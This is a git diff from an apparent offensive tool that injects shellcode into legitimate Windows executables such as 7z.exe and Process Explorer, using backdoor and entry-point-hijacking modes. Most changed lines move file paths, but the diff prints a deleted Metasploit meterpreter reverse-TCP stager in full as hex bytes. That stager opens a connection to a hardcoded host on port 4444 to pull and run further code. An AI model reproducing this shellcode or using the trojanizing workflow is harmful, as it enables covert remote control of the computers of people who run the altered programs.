-\x46\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7 -\x5f\x46\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f -\xbd\x06\x07\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06 -\x07\x07\x46\xbd\x36\x8c\x68\x80\xf8\xd2\xbc\xf7\xb2\xa5 -\x51\x46\xbd\xa1\x92\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b -\x01\x7b\x0d\x87\xfc\xe7\x72\x02\xbc\x40\x14\x75\x68\x6d -\x07\x5e\x46\x8e\xdd\xf8\xd2\x64\x6a\x63\x29\x62\x7f\x62 -\x27\x28\x64\x27\x62\x64\x6f\x68\x27\x66\x27\x39\x27\x64 -\x3d\x5b\x73\x62\x6a\x77\x5b\x66\x07\xb5\x35 \ No newline at end of file diff --git a/shellcodes/msf-meterpreter-reversetcp.txt b/shellcodes/msf-meterpreter-reversetcp.txt deleted file mode 100644 index aa48314..0000000 --- a/shellcodes/msf-meterpreter-reversetcp.txt +++ /dev/null @@ -1,33 +0,0 @@ -\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50 -\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52 -\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48 -\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41 -\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41 -\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f -\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0 -\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b\x48\x18\x49\x01 -\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88 -\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1 -\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8 -\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44 -\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41 -\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83 -\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9 -\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00 -\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49 -\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x58\x68\x41\x54 -\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5 -\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b -\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31 -\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41 -\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58 -\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5 -\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5\x68\xf0\xb5\xa2\x56 -\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04 -\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48 -\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00 -\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53 -\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89 -\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff -\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff -\xe7 \ No newline at end of file diff --git a/supermega.py b/supermega.py index 5a63fbe..c860883 100644 --- a/supermega.py +++ b/supermega.py @@ -1,11 +1,9 @@ import shutil -from enum import Enum import argparse from typing import Dict import os import logging import time -import pefile from helper import * from config import config @@ -25,6 +23,7 @@ from log import setup_logging, writelog def main(): + """Argument parsing for when called from command line""" logger.info("Super Mega") config.load() settings = Settings() @@ -51,7 +50,7 @@ def main(): config.ShowCommandOutput = True if args.verify: - settings.payload_path = "shellcodes/createfile.bin" + settings.payload_path = "data/shellcodes/createfile.bin" settings.verify = True settings.try_start_final_infected_exe = False @@ -59,18 +58,18 @@ def main(): if args.verify == "peb": settings.source_style = SourceStyle.peb_walk settings.inject_mode = InjectStyle.BackdoorCallInstr - settings.inject_exe_in = "exes/7z.exe" - settings.inject_exe_out = "out/7z-verify.exe" + settings.inject_exe_in = "data/exes/7z.exe" + settings.inject_exe_out = "data/exes/7z-verify.exe" elif args.verify == "iat": settings.source_style = SourceStyle.iat_reuse settings.inject_mode = InjectStyle.BackdoorCallInstr - settings.inject_exe_in = "exes/procexp64.exe" - settings.inject_exe_out = "out/procexp64-verify.exe" + settings.inject_exe_in = "data/exes/procexp64.exe" + settings.inject_exe_out = "data/exes/procexp64-verify.exe" elif args.verify == "rwx": settings.source_style = SourceStyle.peb_walk settings.inject_mode = InjectStyle.ChangeEntryPoint # ,2 is broken atm - settings.inject_exe_in = "exes/wifiinfoview.exe" - settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe" + settings.inject_exe_in = "data/exes/wifiinfoview.exe" + settings.inject_exe_out = "data/exes/wifiinfoview.exe-verify.exe" else: logger.info("Unknown verify option {}, use std/iat".format(args.verify)) return @@ -114,7 +113,7 @@ def main(): if not args.shellcode or not args.inject: logger.error("Require: --shellcode --inject ") - logger.info(r"Example: .\supermega.py --shellcode .\shellcodes\calc64.bin --inject .\exes\7z.exe") + logger.info(r"Example: .\supermega.py --shellcode .\data\shellcodes\calc64.bin --inject .\data\exes\7z.exe") return 1 if args.shellcode: @@ -133,6 +132,8 @@ def main(): def start(settings: Settings): + """Main entry point for the application. This is where the magic happens, based on settings""" + # Delete: all old files if settings.cleanup_files_on_start: clean_files() diff --git a/tests/test_datareuse.py b/tests/test_datareuse.py index 306ee62..d0b123d 100644 --- a/tests/test_datareuse.py +++ b/tests/test_datareuse.py @@ -8,7 +8,7 @@ from phases.datareuse import * class DataReuseTest(unittest.TestCase): def test_relocation_list(self): - data_reuser = DataReuser("exes/7z.exe") + data_reuser = DataReuser("data/exes/7z.exe") data_reuser.init() relocs = data_reuser.get_relocations_for_section(".rdata") @@ -21,7 +21,7 @@ class DataReuseTest(unittest.TestCase): def test_largestgap(self): - data_reuser = DataReuser("exes/7z.exe") + data_reuser = DataReuser("data/exes/7z.exe") data_reuser.init() size, start, stop = data_reuser.get_reloc_largest_gap(".rdata") diff --git a/tests/test_derbackdoorer.py b/tests/test_derbackdoorer.py index 5f57eb9..9f1bd42 100644 --- a/tests/test_derbackdoorer.py +++ b/tests/test_derbackdoorer.py @@ -28,13 +28,13 @@ class DerBackdoorerTest(unittest.TestCase): def test_backdoor_ep(self): # Write example shellcode - shellcode_path = "exes/shellcode.test" + shellcode_path = "data/exes/shellcode.test" shellcode = b"\x90" * 200 with open(shellcode_path, "wb") as f: f.write(shellcode) - exe_path = "exes/iattest-full.exe" - exe_out_path = "exes/iattest-full-test.exe" + exe_path = "data/exes/iattest-full.exe" + exe_out_path = "data/exes/iattest-full-test.exe" shutil.copyfile(exe_path, exe_out_path) @@ -59,12 +59,12 @@ class DerBackdoorerTest(unittest.TestCase): def test_backdoor_hijack(self): # Write example shellcode shellcode = b"\x90" * 200 - with open("exes/shellcode.test", "wb") as f: + with open("data/exes/shellcode.test", "wb") as f: f.write(shellcode) - shellcode_path = "exes/shellcode.test" - exe_path = "exes/7z.exe" - exe_out_path = "exes/7z-test.exe" + shellcode_path = "data/exes/shellcode.test" + exe_path = "data/exes/7z.exe" + exe_out_path = "data/exes/7z-test.exe" shutil.copyfile(exe_path, exe_out_path)